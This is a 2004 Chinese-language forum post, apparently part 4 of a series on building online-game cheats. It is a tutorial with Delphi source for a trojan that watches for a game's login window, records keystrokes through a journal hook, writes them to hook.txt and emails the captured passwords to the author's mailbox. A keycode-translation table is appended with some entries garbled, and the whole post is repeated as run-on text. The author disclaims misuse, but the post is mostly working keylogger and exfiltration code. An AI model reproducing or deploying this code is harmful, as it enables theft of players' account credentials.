史萊姆論壇 - 查看單個文章

psac · 2004-10-16, 09:00 AM

網路遊戲外掛製作之我所見（4）

以前介紹過的動作式，本機修改式外掛是真正意義上的外掛，而今天本文要介紹的木馬式外掛，可能大多像木馬吧，是說明做外掛的人偷取別人遊戲的帳號及密碼的東東。因為網路上有此類外掛的存在，所以今天不得不說一下（我個人是非常討厭這類外掛的，請看過本文的朋友不要到處亂用此技術，謝謝合作）。

要做此類外掛的程序實現方法很多（比如HOOK，鍵盤監視等技術），因為HOOK技術對程序員的技術要求比較高並且在實際套用上需要多帶一個動態連接庫，所以在文中我會以鍵盤監視技術來實現此類木馬的製作。

鍵盤監視技術只需要一個.exe文件就能實現做到後台鍵盤監視，這個程序用這種技術來實現比較適合。

在做程序之前我們必需要瞭解一下程序的思法：

1、我們首先知道你想記錄遊戲的登入視窗名稱。

2、判斷登入視窗是否出現。

3、如果登入視窗出現，就記錄鍵盤。

4、當視窗關閉時，把記錄訊息，通過郵件傳送到程序設計者的郵信箱。

第一點我就不具體分析了，因為你們比我還要瞭解你們玩的是什麼遊戲，登入視窗名稱是什麼。從第二點開始，我們就開始這類外掛的程序實現之旅：

那麼我們要怎麼樣判斷登入視窗雖否出現呢？其實這個很簡單，我們用FindWindow函數就可以很輕鬆的實現了：

HWND FindWindow(

LPCTSTR lpClassName, // pointer to class name
LPCTSTR lpWindowName // pointer to window name
);

實際程序實現中，我們要找到'xx'視窗，就用FindWindow(nil,'xx')如果當返回值大於0時表示視窗已經出現，那麼我們就可以對鍵盤訊息進行記錄了。

先首我們用SetWindowsHookEx設定監視日誌，而該函數的用法如下：

HHOOK SetWindowsHookEx(

int idHook, // type of hook to install
HOOKPROC lpfn, // address of hook procedure
HINSTANCE hMod, // handle of application instance
DWORD dwThreadId // identity of thread to install hook for
);
在這裡要說明的是在我們程序當中我們要對HOOKPROC這裡我們要通過寫一個函數，來實現而HINSTANCE這裡我們直接用本程序的HINSTANCE就可以了，具體實現方法為：

hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0);
而HOOKPROC裡的函數就要複雜一點點：

function HookProc(iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall;
begin
if findedtitle then //如果發現視窗後
begin
if (peventmsg(lparam)^.message = WM_KEYDOWN) then //消息等於鍵盤按下
hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH); //通過keyhookresult（自訂的函數，主要功能是轉換截獲的消息參數為按鍵名稱。

我會在文章尾附上轉化函數的）轉換消息。

if length(hookkey) > 0 then //如果獲得按鍵名稱
begin
Write(hookkeyFile,hookkey); //把按鍵名稱寫入文本文件
hookkey := ''
end;
end;
end;

以上就是記錄鍵盤的整個程序，簡單吧，如果記錄完可不要忘記釋放呀，UnHookWindowsHookEx(hHook)，而hHOOK,就是新增setwindowshookex後所返回的關鍵句。

我們已經得到了鍵盤的記錄，那麼現在最後只要把記錄的這些訊息傳送回來，我們就大功造成了。

其他傳送這塊並不是很難，只要把記錄從文本文件裡邊讀出來，用DELPHI原有的的電子郵件元件發一下就萬事OK了。

程式碼如下：

assignfile(ReadFile,'hook.txt'); //開啟hook.txt這個文本文件
reset(ReadFile); //設為讀取方式
try
While not Eof(ReadFile) do //當沒有讀到文件尾
begin
Readln(ReadFile,s,j); //讀取文件行
body:=body+s;
end;
finally
closefile(ReadFile); //關閉文件
end;
nmsmtp1.EncodeType:=uuMime; //設定編碼
nmsmtp1.PostMessage.Attachments.Text:='' //設定附件
nmsmtp1.PostMessage.FromAddress:=&#39XXX@XXX.com' //設定源郵件位址
nmsmtp1.PostMessage.ToAddress.Text:=&#39XXX@XXX.com' /設定目標郵件位址
nmsmtp1.PostMessage.Body.Text:='密碼'+' '+body; //設定郵件內容
nmsmtp1.PostMessage.Subject:='password' //設定郵件標題
nmsmtp1.SendMail; //傳送郵件

這個程序全部功能已經實現，編編試試~~~對了，我以前寫的類似的作品可以在http://www.playicq.com/上找得到。

（其實做一個這樣的東東也不難，基本也是說不上什麼技術可言。希望大看我的文章後不要到處亂套用呀~~~~小生在此有禮了~~~，最後要說的是我最近一段時間很忙，服務機構裡有一堆事情等著我要去做（做項目，做研發，帶實習生，過CMM2~~~~累呀），所以第5篇也不得不推後出了，請大家諒解，做為對大家關心的補償，請大家有什麼問題隨後貼帖留言，如果我會，我會一一解答的，謝謝大家對我的文章的關心~~）

附：
function Keyhookresult(lP: integer; wP: integer): pchar;
begin
result := '[Print Screen]'
case lp of
10688: result := '`'
561: Result := Ƈ'
818: result := ƈ'
1075: result := Ɖ'
1332: result := Ɗ'
1589: result := Ƌ'
1846: result := ƌ'
2103: result := ƍ'
2360: result := Ǝ'
2617: result := Ə'
2864: result := Ɔ'
3261: result := '-'
3515: result := '='
4177: result := 'Q'
4439: result := 'W'
4677: result := 'E'
4946: result := 'R'
5204: result := 'T'
5465: result := 'Y'
5717: result := 'U'
5961: result := 'I'
6223: result := 'O'
6480: result := 'P'
6875: result := '['
7133: result := ']'
11228: result := '\'
7745: result := 'A'
8019: result := 'S'
8260: result := 'D'
8518: result := 'F'
8775: result := 'G'
9032: result := 'H'
9290: result := 'J'
9547: result := 'K'
9804: result := 'L'
10170: result := ''
10462: result := ''''
11354: result := 'Z'
11608: result := 'X'
11843: result := 'C'
12118: result := 'V'
12354: result := 'B'
12622: result := 'N'
12877: result := 'M'
13244: result := ','
13502: result := '.'
13759: result := '/'
13840: result := '[Right-Shift]'
14624: result := '[Space]'
283: result := '[Esc]'
15216: result := '[F1]'
15473: result := '[F2]'
15730: result := '[F3]'
15987: result := '[F4]'
16244: result := '[F5]'
16501: result := '[F6]'
16758: result := '[F7]'
17015: result := '[F8]'
17272: result := '[F9]'
17529: result := '[F10]'
22394: result := '[F11]'
22651: result := '[F12]'
10768: Result := '[Left-Shift]'
14868: result := '[CapsLock]'
3592: result := '[Backspace]'
3849: result := '[Tab]'
7441:
if wp > 30000 then
result := '[Right-Ctrl]'
else
result := '[Left-Ctrl]'
13679: result := '[Num /]'
17808: result := '[NumLock]'
300: result := '[Print Screen]'
18065: result := '[Scroll Lock]'
17683: result := '[Pause]'
21088: result := '[Num0]'
21358: result := '[Num.]'
20321: result := '[Num1]'
20578: result := '[Num2]'
20835: result := '[Num3]'
19300: result := '[Num4]'
19557: result := '[Num5]'
19814: result := '[Num6]'
18279: result := '[Num7]'
18536: result := '[Num8]'
18793: result := '[Num9]'
19468: result := '[*5*]'
14186: result := '[Num *]'
19053: result := '[Num -]'
20075: result := '[Num +]'
21037: result := '[Insert]'
21294: result := '[Delete]'
18212: result := '[Home]'
20259: result := '[End]'
18721: result := '[PageUp]'
20770: result := '[PageDown]'
18470: result := '[UP]'
20520: result := '[DOWN]'
19237: result := '[left]'
19751: result := '[right]'
7181: result := '[Enter]'
end;
end;

2004-10-16, 09:00 AM	#4 (permalink)
psac 榮譽會員榮譽勳章勳章總數19 UID - 3662 在線等級: 註冊日期: 2002-12-07 住址: 木柵市立動物園文章: 17381 精華: 2 現金: 5253 金幣資產: 33853 金幣	網路遊戲外掛製作之我所見（4）以前介紹過的動作式，本機修改式外掛是真正意義上的外掛，而今天本文要介紹的木馬式外掛，可能大多像木馬吧，是說明做外掛的人偷取別人遊戲的帳號及密碼的東東。因為網路上有此類外掛的存在，所以今天不得不說一下（我個人是非常討厭這類外掛的，請看過本文的朋友不要到處亂用此技術，謝謝合作）。要做此類外掛的程序實現方法很多（比如HOOK，鍵盤監視等技術），因為HOOK技術對程序員的技術要求比較高並且在實際套用上需要多帶一個動態連接庫，所以在文中我會以鍵盤監視技術來實現此類木馬的製作。鍵盤監視技術只需要一個.exe文件就能實現做到後台鍵盤監視，這個程序用這種技術來實現比較適合。在做程序之前我們必需要瞭解一下程序的思法： 1、我們首先知道你想記錄遊戲的登入視窗名稱。 2、判斷登入視窗是否出現。 3、如果登入視窗出現，就記錄鍵盤。 4、當視窗關閉時，把記錄訊息，通過郵件傳送到程序設計者的郵信箱。第一點我就不具體分析了，因為你們比我還要瞭解你們玩的是什麼遊戲，登入視窗名稱是什麼。從第二點開始，我們就開始這類外掛的程序實現之旅：那麼我們要怎麼樣判斷登入視窗雖否出現呢？其實這個很簡單，我們用FindWindow函數就可以很輕鬆的實現了： HWND FindWindow( LPCTSTR lpClassName, // pointer to class name LPCTSTR lpWindowName // pointer to window name ); 實際程序實現中，我們要找到'xx'視窗，就用FindWindow(nil,'xx')如果當返回值大於0時表示視窗已經出現，那麼我們就可以對鍵盤訊息進行記錄了。先首我們用SetWindowsHookEx設定監視日誌，而該函數的用法如下： HHOOK SetWindowsHookEx( int idHook, // type of hook to install HOOKPROC lpfn, // address of hook procedure HINSTANCE hMod, // handle of application instance DWORD dwThreadId // identity of thread to install hook for ); 在這裡要說明的是在我們程序當中我們要對HOOKPROC這裡我們要通過寫一個函數，來實現而HINSTANCE這裡我們直接用本程序的HINSTANCE就可以了，具體實現方法為： hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0); 而HOOKPROC裡的函數就要複雜一點點： function HookProc(iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall; begin if findedtitle then //如果發現視窗後 begin if (peventmsg(lparam)^.message = WM_KEYDOWN) then //消息等於鍵盤按下 hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH); //通過keyhookresult（自訂的函數，主要功能是轉換截獲的消息參數為按鍵名稱。我會在文章尾附上轉化函數的）轉換消息。 if length(hookkey) > 0 then //如果獲得按鍵名稱 begin Write(hookkeyFile,hookkey); //把按鍵名稱寫入文本文件 hookkey := '' end; end; end; 以上就是記錄鍵盤的整個程序，簡單吧，如果記錄完可不要忘記釋放呀，UnHookWindowsHookEx(hHook)，而hHOOK,就是新增setwindowshookex後所返回的關鍵句。我們已經得到了鍵盤的記錄，那麼現在最後只要把記錄的這些訊息傳送回來，我們就大功造成了。其他傳送這塊並不是很難，只要把記錄從文本文件裡邊讀出來，用DELPHI原有的的電子郵件元件發一下就萬事OK了。程式碼如下： assignfile(ReadFile,'hook.txt'); //開啟hook.txt這個文本文件 reset(ReadFile); //設為讀取方式 try While not Eof(ReadFile) do //當沒有讀到文件尾 begin Readln(ReadFile,s,j); //讀取文件行 body:=body+s; end; finally closefile(ReadFile); //關閉文件 end; nmsmtp1.EncodeType:=uuMime; //設定編碼 nmsmtp1.PostMessage.Attachments.Text:='' //設定附件 nmsmtp1.PostMessage.FromAddress:=&#39XXX@XXX.com' //設定源郵件位址 nmsmtp1.PostMessage.ToAddress.Text:=&#39XXX@XXX.com' /設定目標郵件位址 nmsmtp1.PostMessage.Body.Text:='密碼'+' '+body; //設定郵件內容 nmsmtp1.PostMessage.Subject:='password' //設定郵件標題 nmsmtp1.SendMail; //傳送郵件這個程序全部功能已經實現，編編試試~~~對了，我以前寫的類似的作品可以在http://www.playicq.com/上找得到。（其實做一個這樣的東東也不難，基本也是說不上什麼技術可言。希望大看我的文章後不要到處亂套用呀~~~~小生在此有禮了~~~，最後要說的是我最近一段時間很忙，服務機構裡有一堆事情等著我要去做（做項目，做研發，帶實習生，過CMM2~~~~累呀），所以第5篇也不得不推後出了，請大家諒解，做為對大家關心的補償，請大家有什麼問題隨後貼帖留言，如果我會，我會一一解答的，謝謝大家對我的文章的關心~~）附： function Keyhookresult(lP: integer; wP: integer): pchar; begin result := '[Print Screen]' case lp of 10688: result := '`' 561: Result := Ƈ' 818: result := ƈ' 1075: result := Ɖ' 1332: result := Ɗ' 1589: result := Ƌ' 1846: result := ƌ' 2103: result := ƍ' 2360: result := Ǝ' 2617: result := Ə' 2864: result := Ɔ' 3261: result := '-' 3515: result := '=' 4177: result := 'Q' 4439: result := 'W' 4677: result := 'E' 4946: result := 'R' 5204: result := 'T' 5465: result := 'Y' 5717: result := 'U' 5961: result := 'I' 6223: result := 'O' 6480: result := 'P' 6875: result := '[' 7133: result := ']' 11228: result := '\' 7745: result := 'A' 8019: result := 'S' 8260: result := 'D' 8518: result := 'F' 8775: result := 'G' 9032: result := 'H' 9290: result := 'J' 9547: result := 'K' 9804: result := 'L' 10170: result := '' 10462: result := '''' 11354: result := 'Z' 11608: result := 'X' 11843: result := 'C' 12118: result := 'V' 12354: result := 'B' 12622: result := 'N' 12877: result := 'M' 13244: result := ',' 13502: result := '.' 13759: result := '/' 13840: result := '[Right-Shift]' 14624: result := '[Space]' 283: result := '[Esc]' 15216: result := '[F1]' 15473: result := '[F2]' 15730: result := '[F3]' 15987: result := '[F4]' 16244: result := '[F5]' 16501: result := '[F6]' 16758: result := '[F7]' 17015: result := '[F8]' 17272: result := '[F9]' 17529: result := '[F10]' 22394: result := '[F11]' 22651: result := '[F12]' 10768: Result := '[Left-Shift]' 14868: result := '[CapsLock]' 3592: result := '[Backspace]' 3849: result := '[Tab]' 7441: if wp > 30000 then result := '[Right-Ctrl]' else result := '[Left-Ctrl]' 13679: result := '[Num /]' 17808: result := '[NumLock]' 300: result := '[Print Screen]' 18065: result := '[Scroll Lock]' 17683: result := '[Pause]' 21088: result := '[Num0]' 21358: result := '[Num.]' 20321: result := '[Num1]' 20578: result := '[Num2]' 20835: result := '[Num3]' 19300: result := '[Num4]' 19557: result := '[Num5]' 19814: result := '[Num6]' 18279: result := '[Num7]' 18536: result := '[Num8]' 18793: result := '[Num9]' 19468: result := '[5]' 14186: result := '[Num *]' 19053: result := '[Num -]' 20075: result := '[Num +]' 21037: result := '[Insert]' 21294: result := '[Delete]' 18212: result := '[Home]' 20259: result := '[End]' 18721: result := '[PageUp]' 20770: result := '[PageDown]' 18470: result := '[UP]' 20520: result := '[DOWN]' 19237: result := '[left]' 19751: result := '[right]' 7181: result := '[Enter]' end; end;

	送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次